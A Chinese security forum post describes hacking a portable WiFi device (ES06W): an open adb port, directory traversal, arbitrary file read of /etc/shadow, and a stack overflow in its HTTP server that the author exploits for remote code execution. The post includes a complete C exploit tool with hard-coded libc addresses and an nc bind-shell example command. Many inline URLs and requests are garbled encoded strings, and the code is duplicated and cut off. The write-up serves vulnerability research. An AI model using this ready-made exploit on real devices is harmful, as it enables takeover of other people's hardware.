首页
社区
课程
招聘
[原创]对一个随身WIFI设备的漏洞挖掘尝试
发表于: 2022-8-5 19:53 26893

[原创]对一个随身WIFI设备的漏洞挖掘尝试

2022-8-5 19:53
26893

最近买了一个随时WIFI设备,正好自己在学习漏洞挖掘,于是拿这个练练手。
设备版本信息:

首先扫描了下设备开放的端口。设备开放了22、80、443、5555、8080、9090等多个端口。SSH爆破测试了下,密码不是弱密码没什么突破。

443、9090端口访问会返回404,可能需要其他参数,没什么突破。
图片描述
设备开放了5555调试端口,可以直接通过adb连接获取设备权限。继续查找有没有其可利用的点。访问8080端口默认跳转到了834K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0m8Q4x3X3f1I4i4K6y4m8z5o6l9^5x3q4)9J5c8Y4k6S2k6q4)9#2k6Y4g2H3k6r3q4@1k6g2)9J5k6h3S2@1L8h3I4Q4c8e0W2Q4b7e0q4Q4b7U0g2Q4c8e0W2Q4z5f1c8Q4b7e0u0Q4c8e0y4Q4z5o6m8Q4z5o6u0Q4c8e0S2Q4b7f1k6Q4b7e0g2Q4c8e0W2Q4b7e0q4Q4b7U0g2Q4c8e0W2Q4z5f1c8Q4b7e0u0Q4c8e0k6Q4z5p5k6Q4z5e0m8Q4c8e0c8Q4b7V1g2Q4z5f1u0Q4c8e0c8Q4b7V1q4Q4z5o6k6Q4c8e0S2Q4b7f1g2Q4b7V1g2Q4c8e0g2Q4b7e0c8Q4z5o6N6Q4c8e0g2Q4z5p5c8Q4z5o6N6Q4c8e0N6Q4b7V1q4Q4b7e0N6Q4c8e0y4Q4z5o6m8Q4z5o6q4Q4c8e0k6Q4z5e0N6Q4b7e0g2Q4c8e0g2Q4b7V1k6Q4z5e0N6Q4c8e0c8Q4b7U0S2Q4z5p5u0Q4c8e0S2Q4b7V1c8Q4b7V1c8Q4c8e0g2Q4z5e0u0Q4z5p5y4m8f1p5&6Q4c8e0S2Q4b7f1g2Q4b7V1g2Q4c8e0N6Q4b7V1c8Q4b7f1g2Q4c8e0g2Q4z5p5q4Q4z5f1k6Q4c8e0S2Q4z5o6y4Q4b7V1c8Q4c8e0y4Q4z5o6m8Q4z5o6t1`.
图片描述

查看BurpSuite历史记录,发现f69K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0m8Q4x3X3f1I4i4K6u0r3k6X3W2D9k6g2)9#2k6X3I4A6M7%4c8Q4x3X3g2B7M7$3!0F1i4K6y4r3k6r3W2J5i4K6y4p5i4@1f1^5i4@1q4r3i4@1t1%4i4@1f1$3i4@1t1I4i4K6R3J5i4@1f1$3i4@1q4r3i4K6V1@1i4@1f1^5i4@1u0q4i4K6R3K6i4@1f1$3i4K6W2o6i4K6R3&6i4@1f1$3i4K6R3@1i4K6S2r3i4@1f1$3i4K6R3H3i4K6W2p5i4@1g2r3i4@1u0o6i4K6S2o6k6r3W2J5i4@1f1$3i4K6S2o6i4K6R3%4i4@1f1#2i4@1q4q4i4K6W2m8i4@1f1%4i4K6W2n7i4@1q4q4i4@1f1#2i4@1u0p5i4K6V1#2i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1^5i4@1u0r3i4K6V1@1i4@1f1#2i4K6W2n7i4K6W2q4i4@1f1#2i4K6S2o6i4K6R3#2i4@1f1^5i4@1u0r3i4K6V1@1i4@1f1#2i4K6W2n7i4K6W2q4i4@1f1@1i4@1u0m8i4K6R3$3K9Y4y4G2L8W2!0q4y4W2!0m8x3q4!0n7b7#2!0q4y4g2!0n7b7#2)9^5c8W2!0q4y4#2)9&6b7g2)9^5y4q4!0q4y4#2)9&6b7W2!0m8c8g2!0q4y4g2!0n7c8q4)9&6y4g2!0q4y4q4!0n7c8W2!0m8x3g2!0q4y4W2)9^5x3g2!0m8c8W2!0q4x3#2)9^5x3q4)9^5x3R3`.`.
图片描述
图片描述
尝试通过dir参数进行目录遍历,如/file_list.json?dir=../../../../../,确认存在目录遍历漏洞。
图片描述

继续查看BurpSuite历史记录,发现24bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0m8Q4x3X3f1I4i4K6u0r3j5i4m8F1M7#2)9J5k6r3y4G2L8X3k6Q4x3X3g2^5L8h3I4Q4c8e0S2Q4b7f1k6Q4b7U0N6Q4c8e0k6Q4b7U0q4Q4z5o6u0Q4c8e0c8Q4b7U0W2Q4z5f1k6Q4c8e0k6Q4b7f1k6Q4z5e0c8Q4c8e0S2Q4b7V1g2Q4z5o6y4Q4c8e0k6Q4z5f1y4Q4z5o6W2Q4c8e0k6Q4z5o6c8Q4z5p5k6Q4c8e0k6Q4z5o6m8Q4z5f1c8Q4c8f1k6Q4b7V1y4Q4z5p5y4g2f1V1W2Q4c8e0k6Q4z5p5y4Q4z5o6N6Q4c8e0g2Q4b7f1g2Q4z5f1q4Q4c8e0c8Q4b7V1q4Q4z5o6k6Q4c8e0c8Q4b7U0S2Q4z5o6m8Q4c8e0c8Q4b7U0S2Q4b7f1q4Q4c8e0k6Q4z5e0k6Q4z5o6N6Q4c8e0c8Q4b7V1u0Q4b7U0k6Q4c8e0g2Q4z5e0m8Q4z5p5c8Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0S2Q4b7V1k6Q4z5e0c8Q4c8e0g2Q4z5f1u0Q4z5f1g2Q4c8e0g2Q4z5p5y4Q4z5o6g2Q4c8e0k6Q4z5e0S2Q4b7f1k6Q4c8e0k6Q4z5e0k6Q4z5o6N6Q4c8e0c8Q4b7V1u0Q4b7U0k6Q4c8e0g2Q4z5o6k6Q4z5o6g2Q4c8e0g2Q4b7f1g2Q4b7U0W2Q4c8e0y4Q4z5o6m8Q4z5o6t1`.
图片描述
于是尝试通过URI进行目录遍历读取文件,确认存在任意文件读取漏洞。这时利用任意文件读取漏洞可以读取到/etc/shadow的SSH密码了,可以尝试破解密码后直接使用SSH登录。
图片描述

接下来准备把HTTP服务程序拿出来分析下。设备默认开启了5555端口,可以直接通过adb连接拿到设备权限。通过看看连接状态可以确定/opt/ejoin/bin/vfd就是HTTP服务程序。
图片描述
图片描述
/opt/ejoin/bin/vfd为32位ARM架构,定位到HTTP请求解析的代码进行分析。首先尝试寻找命令注入漏洞。但是发现vfd中没有system、popen函数,执行命令是调用的sub_C1F4函数。
图片描述
sub_C1F4函数内部调用sub_12024函数,sub_12024函数内部通过调用/opt/ejoin/var/pipe/vshd程序传递参数执行命令。
图片描述
于是查找引用sub_12024函数的地方,sub_12280和sub_12294都不能控制参数,只有sub_122A8函数中参数似乎是可控的。sub_122A8函数中将a1参数拼接到“cd %s”命令中执行。
图片描述
图片描述
继续查找引用sub_122A8函数的地方,发现只有一个地址。通过调式信息来看,传递给sub_122A8函数的a1参数为一个目录。
图片描述
继续查找交叉引用,最终发现目录来自720K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0m8Q4x3X3f1I4i4K6u0r3g2i4m8D9L8$3N6Q4x3X3g2Z5N6r3#2D9i4@1f1^5i4@1q4r3i4@1t1%4i4@1f1$3i4@1t1I4i4K6R3J5i4@1f1%4i4K6W2m8i4K6R3@1k6X3W2D9k6h3&6S2L8h3g2Q4c8e0g2Q4z5p5k6Q4z5o6u0Q4c8e0k6Q4z5e0g2Q4b7U0m8Q4c8e0y4Q4z5o6m8Q4z5o6t1`.
图片描述
图片描述
于是构造下列请求6c4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0m8Q4x3X3f1I4i4K6y4m8z5o6l9^5x3q4)9J5c8Y4g2H3L8r3!0Y4i4K6u0W2K9s2c8E0L8q4)9K6c8X3k6A6L8r3g2F1j5h3#2W2i4K6y4p5i4K6u0r3k6i4c8U0i4K6u0r3M7r3q4K6M7%4N6V1i4K6t1$3j5h3#2H3i4K6y4n7k6X3W2D9k6i4g2J5L8q4)9K6c8o6p5J5x3#2!0q4z5q4!0n7c8W2)9&6b7W2!0q4z5q4!0m8x3g2)9^5b7#2!0q4y4W2!0n7y4g2)9^5b7W2!0q4z5q4!0m8c8W2)9&6y4g2!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4W2!0m8c8q4!0m8x3#2!0q4y4g2!0m8y4g2!0n7c8q4N6q4b7W2!0q4z5g2!0m8x3g2!0n7y4g2!0q4z5g2)9&6c8q4!0m8x3W2!0q4y4g2)9^5c8W2!0m8c8W2!0q4y4q4!0n7b7W2!0m8y4g2!0q4y4q4!0n7z5q4)9^5b7W2!0q4z5q4!0n7c8q4!0n7c8s2k6X3k6q4!0q4y4W2)9&6y4#2!0m8y4g2!0q4y4g2!0n7c8W2)9&6y4#2!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4q4!0n7b7W2)9^5c8g2!0q4y4W2)9&6y4#2!0m8y4g2!0q4y4g2!0n7c8W2)9&6y4#2!0q4y4q4!0n7z5q4!0m8c8q4!0q4y4#2)9&6b7#2)9^5b7W2!0q4y4g2)9^5y4#2!0n7b7g2!0q4c8W2!0n7b7#2)9^5b7%4k6X3k6q4!0q4y4g2!0n7x3q4)9^5y4X3k6A6L8r3g2F1j5h3#2W2i4@1f1$3i4K6S2o6i4K6R3%4i4@1f1#2i4@1q4q4i4K6W2m8i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1^5i4@1t1%4i4@1q4r3i4@1f1#2i4@1u0q4i4K6R3@1i4@1f1#2i4K6R3^5i4K6R3$3i4@1f1#2i4K6R3&6i4@1t1J5i4@1f1#2i4K6R3%4i4@1u0m8i4@1f1%4i4K6W2n7i4@1q4q4i4@1f1#2i4@1u0p5i4K6V1#2i4@1f1#2i4K6V1J5i4K6S2o6i4@1f1$3i4K6V1$3i4K6R3%4i4@1f1@1i4@1u0n7i4@1t1$3i4@1f1#2i4K6V1H3i4K6S2p5i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1#2i4@1t1&6i4@1t1$3i4@1f1#2i4K6R3^5i4K6R3%4i4@1f1$3i4K6S2p5i4@1p5J5i4@1f1#2i4K6R3^5i4@1t1H3i4@1f1%4i4K6W2n7i4@1t1^5i4@1f1#2i4@1u0m8i4K6V1@1i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1%4i4K6W2n7i4@1q4q4i4@1f1#2i4@1u0p5i4K6V1#2i4@1f1#2i4@1t1&6i4@1t1$3i4@1f1#2i4K6S2q4i4K6S2n7i4@1f1%4i4@1u0o6i4@1p5&6i4@1f1$3i4K6V1$3i4K6R3%4i4@1f1@1i4@1u0n7i4@1t1$3i4@1f1K6i4K6R3H3i4K6R3J5
图片描述
尝试构造2b0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0m8Q4x3X3f1I4i4K6y4m8z5o6l9^5x3q4)9J5c8Y4g2H3L8r3!0Y4i4K6u0W2K9s2c8E0L8q4)9K6c8X3k6A6L8r3g2F1j5h3#2W2i4K6y4p5i4K6u0r3k6i4c8U0i4K6u0r3i4K6y4n7K9h3c8Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3V1k6Q4x3X3g2Q4x3X3g2Q4x3V1k6W2N6r3y4Q4x3V1k6H3j5i4y4K6N6$3c8Q4x3U0k6S2L8i4m8Q4x3@1u0X3K9h3I4W2N6i4u0D9i4K6y4p5x3e0t1K6i4@1f1^5i4@1q4r3i4@1t1%4i4@1f1$3i4@1t1I4i4K6R3J5i4@1f1^5i4@1u0r3i4K6W2n7i4@1f1^5i4@1p5I4i4K6S2o6i4@1f1$3i4@1t1#2i4K6S2n7i4@1f1^5i4@1q4r3i4K6V1#2i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1#2i4K6S2r3i4K6V1I4i4@1f1%4i4K6S2q4i4@1t1H3i4@1f1@1i4@1u0n7i4@1p5K6i4@1f1%4i4@1p5H3i4K6R3I4i4@1f1@1i4@1t1^5i4@1q4p5i4@1f1@1i4@1u0o6i4K6W2m8i4@1f1#2i4@1q4r3i4@1t1&6k6X3W2D9k6h3&6S2L8h3g2Q4c8e0k6Q4z5p5y4Q4z5o6N6Q4c8e0g2Q4z5e0m8Q4z5e0q4Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0k6Q4z5e0k6Q4z5o6N6Q4c8e0c8Q4b7V1u0Q4b7U0k6Q4c8e0k6Q4z5e0S2Q4b7f1k6Q4c8e0g2Q4z5e0m8Q4b7e0k6Q4c8e0g2Q4b7f1c8Q4z5e0S2Q4c8e0g2Q4z5f1y4Q4b7e0S2Q4c8e0S2Q4b7V1k6Q4z5f1u0Q4c8e0S2Q4b7e0q4Q4z5p5y4Q4c8e0g2Q4z5o6S2Q4b7e0c8Q4c8e0k6Q4z5e0k6Q4b7f1c8Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0k6Q4z5f1q4Q4z5o6u0Q4c8e0k6Q4z5e0N6Q4b7U0k6Q4c8e0k6Q4b7U0u0Q4b7e0q4Q4c8e0k6Q4b7U0y4Q4z5e0g2Q4c8e0N6Q4b7V1u0Q4z5e0g2Q4c8e0S2Q4b7V1k6Q4z5o6N6Q4c8e0S2Q4b7V1k6Q4z5f1u0Q4c8e0S2Q4b7e0q4Q4z5p5y4Q4c8e0g2Q4z5e0q4Q4b7V1c8Q4c8e0c8Q4b7V1u0Q4b7e0c8Q4c8e0k6Q4b7U0y4Q4b7e0S2Q4c8e0g2Q4z5o6g2Q4b7e0g2Q4c8e0y4Q4z5o6m8Q4z5o6t1`.
图片描述

于是尝试查找vfd解析请求的代码中的栈溢出漏洞。发现解析971K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0m8Q4x3X3f1I4i4K6u0r3k6X3W2D9k6g2)9#2k6X3I4A6M7%4c8Q4x3X3g2B7M7$3!0F1i4K6y4r3k6r3W2J5i4K6y4p5i4@1f1^5i4@1q4r3i4@1t1%4i4@1f1$3i4@1t1I4i4K6R3J5i4@1f1$3i4K6V1%4i4@1t1$3i4@1g2r3i4@1u0o6i4K6S2o6M7%4g2T1i4K6g2X3c8f1f1@1z5q4!0q4y4g2)9^5y4#2!0n7c8q4!0q4y4W2)9&6y4g2!0n7x3q4!0q4y4q4!0n7b7#2)9&6b7g2!0q4y4g2!0n7x3q4)9^5y4X3c8A6M7W2!0q4y4g2)9^5c8W2)9^5x3W2!0q4y4W2)9&6y4g2!0n7x3q4!0q4y4#2)9&6b7g2)9^5y4q4!0q4y4g2)9^5y4W2)9^5y4g2!0q4y4g2!0m8c8g2!0n7z5g2!0q4y4W2)9^5b7W2!0n7b7#2!0q4y4W2)9^5c8g2!0m8y4g2!0q4y4g2)9^5z5q4!0n7x3q4!0q4y4W2!0m8x3q4)9^5z5q4!0q4y4#2!0m8z5g2!0n7b7g2!0q4z5g2)9&6y4#2!0n7y4s2y4Q4c8e0c8Q4b7U0S2Q4b7f1c8Q4c8f1k6Q4b7V1y4Q4z5p5y4K6i4@1f1#2i4K6S2r3i4@1q4m8i4@1f1$3i4K6W2o6i4K6R3&6x3U0f1$3i4@1f1#2i4@1q4p5i4K6V1%4i4@1f1^5i4K6S2m8i4K6R3J5i4@1f1#2i4@1p5@1i4@1p5%4i4@1f1#2i4@1t1H3i4K6S2r3i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1^5i4@1u0r3i4K6V1&6i4@1f1&6i4K6R3%4i4K6S2o6i4@1f1#2i4@1q4p5i4K6V1^5i4@1f1#2i4K6W2o6i4@1p5^5i4@1f1@1i4@1t1^5i4K6R3H3i4@1f1@1i4@1t1^5i4@1q4m8i4@1f1$3i4@1p5H3i4K6R3^5i4@1f1$3i4@1u0m8i4@1p5J5i4@1f1#2i4K6R3%4i4@1u0m8i4@1f1$3i4@1u0o6i4K6S2r3i4@1f1$3i4@1t1@1i4K6W2q4i4@1f1K6i4K6R3H3i4K6R3J5
图片描述
继续查找发现sub_D7A8函数在解析读取文件的请求时,直接将URI拷贝到栈空间s,s只有280字节大小,也存在栈溢出漏洞。
图片描述

这里尝试对sub_D7A8函数中的栈溢出漏洞进行利用。adb连接设备后通过gdb调式vfd程序。构造如下POC发送:

根据PC寄存器地址定位到要覆盖的返回地址偏移为261。
图片描述
修改POC如下,就可以将PC寄存器劫持为指定的地址了。

图片描述
漏洞函数在返回时执行POP {R4-R7,PC},因此R4-R7寄存器也是可以控制的。
图片描述
系统没有随机基址,漏洞利用较为简单,只需要避免字符串截断就行。因此直接从libc库中查找到MOV R0,SP; LDR R2,[R7]; BLX R2;指令的地址0x48d50294用来覆盖返回地址。
图片描述
漏洞函数返回后,SP指向覆盖的返回地址后面,就可以通过URL的内容来控制R0寄存器指向的字符串。R2寄存器可以用R7来控制。Libc中system函数地址为0x48CEA830。找到一个指向system函数地址的指针0x48CB5FBC来控制R7寄存器。
图片描述
图片描述
从新构造如下POC后调式:
图片描述
触发漏洞后执行到0x48d50294时,R7为控制的0x48CB5FBC。
图片描述
此时SP指向用来覆盖返回地址的值后面,可以将要执行的命令拼接在URL末尾来执行命令。
图片描述
执行到BLX R2指令时,R2就是system函数地址了。
图片描述
测试EXP:
图片描述
EXP:

software_version = V4565R03C01S61
hardware_version = M2V1
product_model = ES06W
upgrade_version = V4565R03C01S61
software_version = V4565R03C01S61
hardware_version = M2V1
product_model = ES06W
upgrade_version = V4565R03C01S61
http://192.168.0.1:8080/aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHaIaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbibjbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTbUbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccdcecfcgchcicjckclcmcncocpcqcrcsctcucvcwcxcycz
http://192.168.0.1:8080/aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHaIaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbibjbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTbUbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccdcecfcgchcicjckclcmcncocpcqcrcsctcucvcwcxcycz
http://192.168.0.1:8080/aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHaIaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbibjbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTbUbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccdc123DDDD
http://192.168.0.1:8080/aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHaIaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbibjbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTbUbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccdc123DDDD
// ES06W-RCE.cpp :
//
#include "stdafx.h"
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <WinSock2.h>
#include <Windows.h>
 
 
 
#pragma comment(lib, "ws2_32.lib")
 
void ShowHelp()
{
    printf("[+]Usage: ES06W-RCE.exe [Command]\n");
    printf("[+]Example: ES06W-RCE.exe \"nc${IFS}-lp${IFS}4444${IFS}-e${IFS}/bin/sh\"\n");
}
 
 
int main(int argc, char** argv)
{
    WSADATA stcData = {};
    int int_ret = 0;
    char str_recv[0x1000] = {};
    char str_payload_final[0x1000] = {};
 
    //
    if (argc != 2) {
        ShowHelp();
        return 0;
    }
    //
    int_ret = WSAStartup(MAKEWORD(2, 2), &stcData);
    if (int_ret == SOCKET_ERROR) {
        printf("[-]Init Failed!\n");
        return 0;
    }
    //
 
    char str_payload[] = {
        "GET /aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHa"
        "IaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbib"
        "jbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTb"
        "UbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccd"
        "\xBC\x5F\xCB\x48"                    //Control R7
        "\x94\x02\xD5\x48"                    //Return Addr
        "%s"                                //Command
        " HTTP/1.1\r\n"       
        "Host: 192.168.0.1:8080\r\n"
        "Connection: keep-alive\r\n"
        "Upgrade-Insecure-Requests: 1\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\r\n"
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Accept-Language: zh-CN,zh;q=0.9\r\n\r\n\0"
    };
 
    sprintf_s(str_payload_final, 0x1000, str_payload, argv[1]);
 
    //
    SOCKET sock_client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    sockaddr_in sock_addr;
    sock_addr.sin_family = AF_INET;
    sock_addr.sin_port = htons(8080);
    sock_addr.sin_addr.S_un.S_addr = inet_addr("192.168.0.1");
    //
    int nErrCode = 0;
    int_ret = connect(sock_client, (sockaddr*)&sock_addr, sizeof(sockaddr_in));
    //
    send(sock_client, str_payload_final, strlen(str_payload_final), 0);
    //
    Sleep(20);
    recv(sock_client, str_recv, sizeof(str_recv), 0);
    printf("[-]Recv: %s\n", str_recv);
 
    printf("[+]Finished!\n");
    closesocket(sock_client);
    WSACleanup();
    //
    return 0;
}
// ES06W-RCE.cpp :
//
#include "stdafx.h"
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <WinSock2.h>
#include <Windows.h>
 
 
 
#pragma comment(lib, "ws2_32.lib")
 
void ShowHelp()
{
    printf("[+]Usage: ES06W-RCE.exe [Command]\n");
    printf("[+]Example: ES06W-RCE.exe \"nc${IFS}-lp${IFS}4444${IFS}-e${IFS}/bin/sh\"\n");
}
 
 
int main(int argc, char** argv)
{
    WSADATA stcData = {};
    int int_ret = 0;
    char str_recv[0x1000] = {};
    char str_payload_final[0x1000] = {};
 
    //
    if (argc != 2) {
        ShowHelp();
        return 0;
    }
    //
    int_ret = WSAStartup(MAKEWORD(2, 2), &stcData);
    if (int_ret == SOCKET_ERROR) {

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 18
支持
分享
最新回复 (11)
雪    币: 13990
活跃值: (9912)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
老哥牛啤,羡慕这系统安全和web安全都能搞的全能选手。。。
2022-8-5 21:05
0
雪    币: 14909
活跃值: (18090)
能力值: ( LV12,RANK:290 )
在线值:
发帖
回帖
粉丝
3
感谢分享
2022-8-7 23:21
0
雪    币: 319
活跃值: (372)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
感谢分享
2022-8-8 11:15
0
雪    币: 2960
活跃值: (5191)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
5
666
2022-8-8 15:09
0
雪    币: 864
活跃值: (5144)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
2022-8-9 11:59
0
雪    币: 220
活跃值: (118)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
666
2022-8-9 15:06
0
雪    币: 914
活跃值: (2568)
能力值: ( LV5,RANK:68 )
在线值:
发帖
回帖
粉丝
8
2022-8-10 09:44
0
雪    币: 4496
活跃值: (5240)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
学习了,感谢分享
2022-8-10 19:12
0
雪    币:
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
10
666
2022-10-13 09:42
0
雪    币: 2341
活跃值: (2269)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
11
太强了,逆向、审计、渗透、代码能力都是全能啊,膜拜大佬!
2022-10-13 11:28
0
雪    币: 18
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
12
师傅这款是用的那一款产品想跟着复现一下
2022-11-19 18:06
0
游客
登录 | 注册 方可回帖
返回